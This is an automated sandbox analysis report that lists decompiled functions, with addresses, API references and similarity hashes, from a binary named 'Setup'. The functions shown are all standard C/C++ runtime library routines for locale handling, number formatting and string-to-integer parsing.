                                                                                                                                                                                              0x00414c4f
                                                                                                                                                                                              0x00414c55
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00414c57
                                                                                                                                                                                              0x00414c5a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00414c5c
                                                                                                                                                                                              0x00414c5c
                                                                                                                                                                                              0x00414c62
                                                                                                                                                                                              0x00414c65
                                                                                                                                                                                              0x00414bd3
                                                                                                                                                                                              0x00414bd3
                                                                                                                                                                                              0x00414c6e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00414c6e
                                                                                                                                                                                              0x00414c27
                                                                                                                                                                                              0x00414c2a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00414c2e
                                                                                                                                                                                              0x00414c3f
                                                                                                                                                                                              0x00414c45
                                                                                                                                                                                              0x00414c47
                                                                                                                                                                                              0x00414c4a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00414c4a
                                                                                                                                                                                              0x00414be7
                                                                                                                                                                                              0x00414bea
                                                                                                                                                                                              0x00414bec
                                                                                                                                                                                              0x00414bf2
                                                                                                                                                                                              0x00414bf2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00414bc2
                                                                                                                                                                                              0x00414bc2
                                                                                                                                                                                              0x00414bc7
                                                                                                                                                                                              0x00414bcb
                                                                                                                                                                                              0x00414bcb
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00414bc7
                                                                                                                                                                                              0x00414bc0

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00414BDA
                                                                                                                                                                                              • __isleadbyte_l.LIBCMT ref: 00414C0E
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,?,?,00000000,?,?,?), ref: 00414C3F
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000,?,?,?), ref: 00414CAD
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3058430110-0
                                                                                                                                                                                              • Opcode ID: 2248349b3adebb7ec3e036749ef7e5163a0351a6de83f0379f8cf8180d272b48
                                                                                                                                                                                              • Instruction ID: 55503d65a2be66e65ec4df66936dc64a55613afbd592f6a73ee27648ceb9382d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2248349b3adebb7ec3e036749ef7e5163a0351a6de83f0379f8cf8180d272b48
                                                                                                                                                                                              • Instruction Fuzzy Hash: D731F231605245EFCB20CF64CC80AEE3BA5FF81315F1645AAE4648B291E334EDD0DB99
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0040B821 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E0040B821(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E0040B112(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E0040B202(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E0040B727(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E0040B66C(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}






                                                                                                                                                                                              0x0040b826
                                                                                                                                                                                              0x0040b82c
                                                                                                                                                                                              0x0040b89f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040b833
                                                                                                                                                                                              0x0040b833
                                                                                                                                                                                              0x0040b836
                                                                                                                                                                                              0x0040b851
                                                                                                                                                                                              0x0040b854
                                                                                                                                                                                              0x0040b874
                                                                                                                                                                                              0x0040b886
                                                                                                                                                                                              0x0040b856
                                                                                                                                                                                              0x0040b856
                                                                                                                                                                                              0x0040b859
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040b85b
                                                                                                                                                                                              0x0040b86d
                                                                                                                                                                                              0x0040b86d
                                                                                                                                                                                              0x0040b859
                                                                                                                                                                                              0x0040b8a4
                                                                                                                                                                                              0x0040b8a8
                                                                                                                                                                                              0x0040b838
                                                                                                                                                                                              0x0040b850
                                                                                                                                                                                              0x0040b850
                                                                                                                                                                                              0x0040b836

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3016257755-0
                                                                                                                                                                                              • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                              • Instruction ID: 917148e99d6715f3f9427948868db8f5a0662184000f97645bee8d580e0da7c1
                                                                                                                                                                                              • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                              • Instruction Fuzzy Hash: D4116032000049BBCF166E85CC45CEE3F26FF18394B18842AFE1869271D33AC971AB89
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00409021 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 90%
                                                                                                                                                                                              			E00409021(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x4286c0);
				E0040D194(__ebx, __edi, __esi);
				_t28 = E0040BE6F(__ebx, __edx, __edi, _t30);
				_t13 =  *0x454cb0; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E0040C69C(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x454d98; // 0x1f310f8
					 *((intOrPtr*)(_t29 - 0x1c)) = E00408FE3(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E0040908B();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E0040BE6F(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E0040DB05(_t25, _t26, 0x20);
				}
				return E0040D1D9(_t28);
			}







                                                                                                                                                                                              0x00409021
                                                                                                                                                                                              0x00409021
                                                                                                                                                                                              0x00409021
                                                                                                                                                                                              0x00409021
                                                                                                                                                                                              0x00409021
                                                                                                                                                                                              0x00409023
                                                                                                                                                                                              0x00409028
                                                                                                                                                                                              0x00409032
                                                                                                                                                                                              0x00409034
                                                                                                                                                                                              0x0040903c
                                                                                                                                                                                              0x00409060
                                                                                                                                                                                              0x00409062
                                                                                                                                                                                              0x00409068
                                                                                                                                                                                              0x0040906c
                                                                                                                                                                                              0x0040906f
                                                                                                                                                                                              0x0040907a
                                                                                                                                                                                              0x0040907d
                                                                                                                                                                                              0x00409084
                                                                                                                                                                                              0x0040903e
                                                                                                                                                                                              0x0040903e
                                                                                                                                                                                              0x00409042
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00409044
                                                                                                                                                                                              0x00409049
                                                                                                                                                                                              0x00409049
                                                                                                                                                                                              0x00409042
                                                                                                                                                                                              0x0040904e
                                                                                                                                                                                              0x00409052
                                                                                                                                                                                              0x00409057
                                                                                                                                                                                              0x0040905f

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __getptd.LIBCMT ref: 0040902D
                                                                                                                                                                                                • Part of subcall function 0040BE6F: __getptd_noexit.LIBCMT ref: 0040BE72
                                                                                                                                                                                                • Part of subcall function 0040BE6F: __amsg_exit.LIBCMT ref: 0040BE7F
                                                                                                                                                                                              • __getptd.LIBCMT ref: 00409044
                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 00409052
                                                                                                                                                                                              • __lock.LIBCMT ref: 00409062
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3521780317-0
                                                                                                                                                                                              • Opcode ID: 634bed26dba08abea9a18b9c33b344bdb1f744dbda4546a7de1c9bcdc6e1149c
                                                                                                                                                                                              • Instruction ID: 27c1e4a7e4a669fde2f83778ef491635845617a52713f8d6ff37d315b0c4ed48
                                                                                                                                                                                              • Opcode Fuzzy Hash: 634bed26dba08abea9a18b9c33b344bdb1f744dbda4546a7de1c9bcdc6e1149c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8FF06D319407008AD721BBB6940678E73A0AF40718F11417FE840BB2D3CB3C9D45CB9E
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00421250 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00421250(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char* _a28, intOrPtr _a32) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v48;
				char* _v52;
				intOrPtr _v56;
				char _v60;
				char _v68;
				char _v76;
				char _v84;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				intOrPtr _t123;
				intOrPtr _t128;
				intOrPtr* _t134;
				intOrPtr* _t144;
				intOrPtr* _t149;
				intOrPtr* _t153;
				void* _t154;
				intOrPtr _t195;
				void* _t251;
				void* _t252;

				_t174 = __ebx;
				_t123 = E00421850(__ebx, __edi, __eflags, E0041DDE0(_a20,  &_v60));
				_t252 = _t251 + 4;
				_v12 = _t123;
				E0041DD10( &_v60);
				E00421820(_v12,  &_v48);
				if( *_a28 == 0x2b ||  *_a28 == 0x2d) {
					_v100 = 1;
				} else {
					if( *_a28 != 0x30 ||  *((char*)(_a28 + 1)) != 0x78 &&  *((char*)(_a28 + 1)) != 0x58) {
						_v96 = 0;
					} else {
						_v96 = 2;
					}
					_v100 = _v96;
				}
				_v16 = _v100;
				if( *((char*)(E00401370( &_v48))) == 0x7f ||  *((char*)(E00401370( &_v48))) <= 0) {
					L18:
					_t128 = E0041F900(_a20);
					__eflags = _t128;
					if(_t128 <= 0) {
						L21:
						_v104 = 0;
						L22:
						_v20 = _v104;
						_v8 = E0041DDC0(_a20) & 0x000001c0;
						__eflags = _v8 - 0x40;
						if(_v8 == 0x40) {
							L25:
							__eflags = _v8 - 0x100;
							if(_v8 == 0x100) {
								_t144 = E00421620(_a4,  &_v76, _a12, _a16, _a28, _v16);
								_a12 =  *_t144;
								_a16 =  *((intOrPtr*)(_t144 + 4));
								_a28 = _a28 + _v16;
								_t195 = _a32 - _v16;
								__eflags = _t195;
								_a32 = _t195;
								_t149 = E00421570(_a4,  &_v84, _a12, _a16, _a24 & 0x000000ff, _v20);
								_t252 = _t252 + 0x30;
								_a12 =  *_t149;
								_a16 =  *((intOrPtr*)(_t149 + 4));
								_v20 = 0;
							}
							L27:
							_t134 = E00421690(_a4,  &_v92, _a12, _a16, _a28, _a32, E00421800(_v12) & 0x000000ff);
							_a12 =  *_t134;
							_a16 =  *((intOrPtr*)(_t134 + 4));
							E0041F920(_a20, 0);
							E00421570(_a4, _a8, _a12, _a16, _a24 & 0x000000ff, _v20);
							E00401070( &_v48);
							return _a8;
						}
						__eflags = _v8 - 0x100;
						if(_v8 == 0x100) {
							goto L25;
						}
						_t153 = E00421570(_a4,  &_v68, _a12, _a16, _a24 & 0x000000ff, _v20);
						_t252 = _t252 + 0x18;
						_a12 =  *_t153;
						_a16 =  *((intOrPtr*)(_t153 + 4));
						_v20 = 0;
						goto L27;
					}
					_t154 = E0041F900(_a20);
					__eflags = _t154 - _a32;
					if(_t154 <= _a32) {
						goto L21;
					}
					_v104 = E0041F900(_a20) - _a32;
					goto L22;
				} else {
					_v52 = E00401370( &_v48);
					_v56 = _a32;
					while( *_v52 != 0x7f &&  *_v52 > 0 &&  *_v52 < _v56 - _v16) {
						_v56 = _v56 -  *_v52;
						E00406ED3(_t174, _a28 + _v56 + 1, _a32 + 1 - _v56, _a28 + _v56, _a32 + 1 - _v56);
						_t252 = _t252 + 0x10;
						 *((char*)(_a28 + _v56)) = 0;
						_a32 = _a32 + 1;
						if( *((char*)(_v52 + 1)) > 0) {
							_v52 = _v52 + 1;
						}
					}
					goto L18;
				}
			}




























                                                                                                                                                                                              0x00421250
                                                                                                                                                                                              0x00421263
                                                                                                                                                                                              0x00421268
                                                                                                                                                                                              0x0042126b
                                                                                                                                                                                              0x00421271
                                                                                                                                                                                              0x0042127d
                                                                                                                                                                                              0x0042128b
                                                                                                                                                                                              0x004212d3
                                                                                                                                                                                              0x00421298
                                                                                                                                                                                              0x004212a1
                                                                                                                                                                                              0x004212c4
                                                                                                                                                                                              0x004212bb
                                                                                                                                                                                              0x004212bb
                                                                                                                                                                                              0x004212bb
                                                                                                                                                                                              0x004212ce
                                                                                                                                                                                              0x004212ce
                                                                                                                                                                                              0x004212dd
                                                                                                                                                                                              0x004212ee
                                                                                                                                                                                              0x004213a8
                                                                                                                                                                                              0x004213ab
                                                                                                                                                                                              0x004213b0
                                                                                                                                                                                              0x004213b2
                                                                                                                                                                                              0x004213d1
                                                                                                                                                                                              0x004213d1
                                                                                                                                                                                              0x004213d8
                                                                                                                                                                                              0x004213db
                                                                                                                                                                                              0x004213eb
                                                                                                                                                                                              0x004213ee
                                                                                                                                                                                              0x004213f2
                                                                                                                                                                                              0x00421432
                                                                                                                                                                                              0x00421432
                                                                                                                                                                                              0x00421439
                                                                                                                                                                                              0x00421453
                                                                                                                                                                                              0x00421460
                                                                                                                                                                                              0x00421463
                                                                                                                                                                                              0x0042146c
                                                                                                                                                                                              0x00421472
                                                                                                                                                                                              0x00421472
                                                                                                                                                                                              0x00421475
                                                                                                                                                                                              0x00421491
                                                                                                                                                                                              0x00421496
                                                                                                                                                                                              0x0042149e
                                                                                                                                                                                              0x004214a1
                                                                                                                                                                                              0x004214a4
                                                                                                                                                                                              0x004214a4
                                                                                                                                                                                              0x004214ab
                                                                                                                                                                                              0x004214cf
                                                                                                                                                                                              0x004214dc
                                                                                                                                                                                              0x004214df
                                                                                                                                                                                              0x004214e7
                                                                                                                                                                                              0x00421505
                                                                                                                                                                                              0x00421510
                                                                                                                                                                                              0x0042151b
                                                                                                                                                                                              0x0042151b
                                                                                                                                                                                              0x004213f4
                                                                                                                                                                                              0x004213fb
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00421416
                                                                                                                                                                                              0x0042141b
                                                                                                                                                                                              0x00421423
                                                                                                                                                                                              0x00421426
                                                                                                                                                                                              0x00421429
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00421429
                                                                                                                                                                                              0x004213b7
                                                                                                                                                                                              0x004213bc
                                                                                                                                                                                              0x004213bf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004213cc
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00421307
                                                                                                                                                                                              0x0042130f
                                                                                                                                                                                              0x00421315
                                                                                                                                                                                              0x00421318
                                                                                                                                                                                              0x0042134c
                                                                                                                                                                                              0x00421375
                                                                                                                                                                                              0x0042137a
                                                                                                                                                                                              0x00421383
                                                                                                                                                                                              0x0042138c
                                                                                                                                                                                              0x00421398
                                                                                                                                                                                              0x004213a0
                                                                                                                                                                                              0x004213a0
                                                                                                                                                                                              0x004213a3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00421318

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 0041DDE0: std::locale::locale.LIBCPMTD ref: 0041DDF1
                                                                                                                                                                                                • Part of subcall function 00421850: std::_Lockit::_Lockit.LIBCPMT ref: 0042185B
                                                                                                                                                                                                • Part of subcall function 00421850: int.LIBCPMTD ref: 0042186D
                                                                                                                                                                                                • Part of subcall function 00421850: std::locale::_Getfacet.LIBCPMTD ref: 0042187C
                                                                                                                                                                                                • Part of subcall function 0041DD10: std::locale::facet::_Decref.LIBCPMTD ref: 0041DD26
                                                                                                                                                                                              • _memmove_s.LIBCMT ref: 00421375
                                                                                                                                                                                              • std::ios_base::width.LIBCPMTD ref: 004214E7
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: DecrefGetfacetLockitLockit::__memmove_sstd::_std::ios_base::widthstd::locale::_std::locale::facet::_std::locale::locale
                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                              • API String ID: 3492058185-2766056989
                                                                                                                                                                                              • Opcode ID: 2e2dc0da89fd4db0d410b2c6fba3b9109b9b39e4cd0df061848c92d8c1104458
                                                                                                                                                                                              • Instruction ID: ed61fd3f5d2db27660191674eecfa3f00e279f769a57a46731801c3494bcd584
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e2dc0da89fd4db0d410b2c6fba3b9109b9b39e4cd0df061848c92d8c1104458
                                                                                                                                                                                              • Instruction Fuzzy Hash: 48A11AB1A001589FCB04DF98E9909EFBBB6BF99304F54815EF819A7361D738AD01CB94
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00404453 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 201COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                              			E00404453(signed int __edx, signed char* _a4, signed int _a8, intOrPtr _a12, signed int _a16) {
				char _v5;
				signed int _v6;
				signed int _v12;
				signed char* _v16;
				signed char* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				intOrPtr* _t60;
				signed int _t61;
				char _t63;
				intOrPtr _t64;
				signed char** _t65;
				signed int _t66;
				signed char _t67;
				void* _t69;
				signed int _t74;
				signed int _t75;
				signed int _t79;
				signed int _t83;
				void* _t86;
				signed int _t89;
				signed char _t93;
				signed int _t95;
				signed int _t98;
				void* _t102;
				signed int _t111;
				signed char* _t115;
				signed char* _t119;
				char* _t121;
				void* _t123;
				void* _t124;
				void* _t125;
				void* _t126;

				_t111 = __edx;
				_t60 = _a16;
				_t125 = _t124 - 0x28;
				_t95 = 0;
				if(_t60 != 0) {
					 *_t60 = 0;
				}
				_t119 = _a4;
				_t61 =  *_t119 & 0x000000ff;
				_t115 = _t119;
				while(E0040A445(_t61) != 0) {
					_t115 =  &(_t115[1]);
					__eflags = _t115;
					_t61 =  *_t115 & 0x000000ff;
				}
				_t63 =  *_t115;
				if(_t63 == 0x2d || _t63 == 0x2b) {
					_v5 = _t63;
					_t115 =  &(_t115[1]);
					__eflags = _t115;
				} else {
					_v5 = 0x2b;
				}
				_t64 = _a12;
				if(_t64 < _t95 || _t64 == 1 || _t64 > 0x24) {
					_t65 = _a8;
					__eflags = _t65 - _t95;
					if(_t65 != _t95) {
						 *_t65 = _t119;
					}
					goto L51;
				} else {
					if(_t64 <= _t95) {
						__eflags =  *_t115 - 0x30;
						if( *_t115 == 0x30) {
							_t67 = _t115[1];
							__eflags = _t67 - 0x78;
							if(_t67 == 0x78) {
								L23:
								_a12 = 0x10;
								L24:
								_t115 =  &(_t115[2]);
								L25:
								_v16 = _t115;
								while( *_t115 == 0x30) {
									_t115 =  &(_t115[1]);
									__eflags = _t115;
								}
								_v28 = _t95;
								_v24 = _t95;
								_v20 = _t115;
								_v40 = _t95;
								_v6 = _t95;
								_t69 = E0040AAE0( *_t115);
								_t121 = "0123456789abcdefghijklmnopqrstuvwxyz";
								_t102 = E00406E00(_t121, _t69, _a12);
								_t126 = _t125 + 0xc;
								if(_t102 == 0) {
									L31:
									if(_v16 != _t115) {
										_t36 = _a12 + 0x424f98; // 0x10101011
										_t74 = _t115 -  *_t36 - _v20;
										__eflags = _t74;
										if(_t74 < 0) {
											L44:
											__eflags = _v5 - 0x2d;
											if(_v5 == 0x2d) {
												asm("adc ecx, 0x0");
												_v28 =  ~_v28;
												_v24 =  ~_v24;
											}
											_t75 = _a8;
											__eflags = _t75;
											if(_t75 != 0) {
												 *_t75 = _t115;
											}
											_t66 = _v28;
											L52:
											return _t66;
										}
										__eflags = _t74;
										if(__eflags > 0) {
											L41:
											 *((intOrPtr*)(E0040A982(__eflags))) = 0x22;
											_t79 = _a16;
											__eflags = _t79;
											if(_t79 != 0) {
												 *_t79 = 1;
											}
											_v28 = _v28 | 0xffffffff;
											_t48 =  &_v24;
											 *_t48 = _v24 | 0xffffffff;
											__eflags =  *_t48;
											_v5 = 0x2b;
											goto L44;
										}
										_t106 = _v24;
										asm("cdq");
										_t123 = _v28 - _v6;
										asm("sbb ecx, edx");
										__eflags = _v24 - _v24;
										if(__eflags < 0) {
											goto L41;
										}
										if(__eflags > 0) {
											L39:
											asm("cdq");
											__eflags = E0040AB10(_t123, _t106, _a12, _t111) - _t95;
											if(__eflags != 0) {
												goto L41;
											}
											__eflags = _t111 - _v40;
											if(__eflags == 0) {
												goto L44;
											}
											goto L41;
										}
										__eflags = _v28 - _t123;
										if(__eflags < 0) {
											goto L41;
										}
										goto L39;
									}
									_t83 = _a8;
									if(_t83 != 0) {
										 *_t83 = _a4;
									}
									L51:
									_t66 = 0;
									goto L52;
								}
								asm("cdq");
								_v36 = _a12;
								_v32 = _t111;
								do {
									_t98 = _t102 - _t121;
									_v6 = _t98;
									_t86 = E0040AB80(_v36, _v32, _v28, _v24);
									_v12 = _t111;
									asm("cdq");
									_t89 = _v12;
									asm("adc eax, edx");
									_v24 = _t89;
									_t115 =  &(_t115[1]);
									_v40 = _t89;
									_t95 = _t86 + _t98;
									_v28 = _t95;
									_t102 = E00406E00(_t121, E0040AAE0( *_t115), _a12);
									_t126 = _t126 + 0xc;
								} while (_t102 != 0);
								goto L31;
							}
							__eflags = _t67 - 0x58;
							if(_t67 == 0x58) {
								goto L23;
							}
							_a12 = 8;
							goto L25;
						}
						_a12 = 0xa;
						goto L25;
					}
					if(_t64 != 0x10 ||  *_t115 != 0x30) {
						goto L25;
					} else {
						_t93 = _t115[1];
						if(_t93 == 0x78) {
							goto L24;
						}
						if(_t93 != 0x58) {
							goto L25;
						}
						goto L24;
					}
				}
			}







































                                                                                                                                                                                              0x00404453
                                                                                                                                                                                              0x00404458
                                                                                                                                                                                              0x0040445b
                                                                                                                                                                                              0x0040445f
                                                                                                                                                                                              0x00404465
                                                                                                                                                                                              0x00404467
                                                                                                                                                                                              0x00404467
                                                                                                                                                                                              0x00404469
                                                                                                                                                                                              0x0040446c
                                                                                                                                                                                              0x0040446f
                                                                                                                                                                                              0x00404477
                                                                                                                                                                                              0x00404473
                                                                                                                                                                                              0x00404473
                                                                                                                                                                                              0x00404474
                                                                                                                                                                                              0x00404474
                                                                                                                                                                                              0x00404482
                                                                                                                                                                                              0x00404486
                                                                                                                                                                                              0x00404492
                                                                                                                                                                                              0x00404495
                                                                                                                                                                                              0x00404495
                                                                                                                                                                                              0x0040448c
                                                                                                                                                                                              0x0040448c
                                                                                                                                                                                              0x0040448c
                                                                                                                                                                                              0x00404496
                                                                                                                                                                                              0x0040449b
                                                                                                                                                                                              0x00404643
                                                                                                                                                                                              0x00404646
                                                                                                                                                                                              0x00404648
                                                                                                                                                                                              0x0040464a
                                                                                                                                                                                              0x0040464a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004044b3
                                                                                                                                                                                              0x004044b7
                                                                                                                                                                                              0x004044cf
                                                                                                                                                                                              0x004044d1
                                                                                                                                                                                              0x004044dc
                                                                                                                                                                                              0x004044df
                                                                                                                                                                                              0x004044e1
                                                                                                                                                                                              0x004044f0
                                                                                                                                                                                              0x004044f0
                                                                                                                                                                                              0x004044f7
                                                                                                                                                                                              0x004044f8
                                                                                                                                                                                              0x004044f9
                                                                                                                                                                                              0x004044f9
                                                                                                                                                                                              0x004044ff
                                                                                                                                                                                              0x004044fe
                                                                                                                                                                                              0x004044fe
                                                                                                                                                                                              0x004044fe
                                                                                                                                                                                              0x00404509
                                                                                                                                                                                              0x0040450d
                                                                                                                                                                                              0x00404510
                                                                                                                                                                                              0x00404513
                                                                                                                                                                                              0x00404516
                                                                                                                                                                                              0x00404519
                                                                                                                                                                                              0x00404520
                                                                                                                                                                                              0x0040452b
                                                                                                                                                                                              0x0040452d
                                                                                                                                                                                              0x00404532
                                                                                                                                                                                              0x00404593
                                                                                                                                                                                              0x00404596
                                                                                                                                                                                              0x004045b0
                                                                                                                                                                                              0x004045bb
